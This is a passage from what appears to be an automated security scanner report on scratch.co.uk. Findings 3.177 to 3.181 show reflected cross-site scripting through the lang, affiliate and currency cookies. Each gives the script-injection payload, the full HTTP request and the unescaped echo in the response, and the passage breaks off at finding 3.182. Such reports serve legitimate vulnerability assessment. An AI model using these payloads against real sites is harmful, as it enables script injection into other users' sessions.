3.177. http://scratch.co.uk/over-18/ [lang cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /over-18/

Issue detail

The value of the lang cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2f0a"><script>alert(1)</script>260d517347e was submitted in the lang cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /over-18/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENGb2f0a"><script>alert(1)</script>260d517347e; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:01 GMT; path=/
Set-Cookie: lang=ENGb2f0a%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E260d517347e; expires=Wed, 15-Jun-2011 12:30:01 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:30:01 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:30:01 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 10735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENGb2f0a"><script>alert(1)</script>260d517347e', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.178. http://scratch.co.uk/problem-gambling/ [affiliate cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /problem-gambling/

Issue detail

The value of the affiliate cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 394d5"><script>alert(1)</script>18bf32caf70 was submitted in the affiliate cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /problem-gambling/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243394d5"><script>alert(1)</script>18bf32caf70; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:26:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243394d5%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E18bf32caf70; expires=Wed, 15-Jun-2011 12:26:06 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:26:06 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:26:06 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:26:06 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 13878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG', 'direct-173|193|214|243394d5"><script>alert(1)</script>18bf32caf70');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.179. http://scratch.co.uk/problem-gambling/ [currency cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /problem-gambling/

Issue detail

The value of the currency cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46cdc"><script>alert(1)</script>71a5e08c364 was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /problem-gambling/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP46cdc"><script>alert(1)</script>71a5e08c364;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:39 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:39 GMT; path=/
Set-Cookie: currency=GBP46cdc%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E71a5e08c364; expires=Wed, 15-Jun-2011 12:30:39 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:30:39 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 13769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP46cdc"><script>alert(1)</script>71a5e08c364', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.180. http://scratch.co.uk/problem-gambling/ [lang cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /problem-gambling/

Issue detail

The value of the lang cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c926"><script>alert(1)</script>9dd75eb04f8 was submitted in the lang cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /problem-gambling/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG6c926"><script>alert(1)</script>9dd75eb04f8; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:29:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:40 GMT; path=/
Set-Cookie: lang=ENG6c926%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E9dd75eb04f8; expires=Wed, 15-Jun-2011 12:29:40 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:40 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:40 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14032

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG6c926"><script>alert(1)</script>9dd75eb04f8', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.181. http://scratch.co.uk/promotions/ [affiliate cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /promotions/

Issue detail

The value of the affiliate cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a0e9"><script>alert(1)</script>086149d4525 was submitted in the affiliate cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /promotions/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C2433a0e9"><script>alert(1)</script>086149d4525; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C2433a0e9%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E086149d4525; expires=Wed, 15-Jun-2011 12:25:32 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:32 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:32 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:32 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG', 'direct-173|193|214|2433a0e9"><script>alert(1)</script>086149d4525');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.182. http://scratch.co.uk/promotions/ [currency cookie]

Summary

Severity:   Information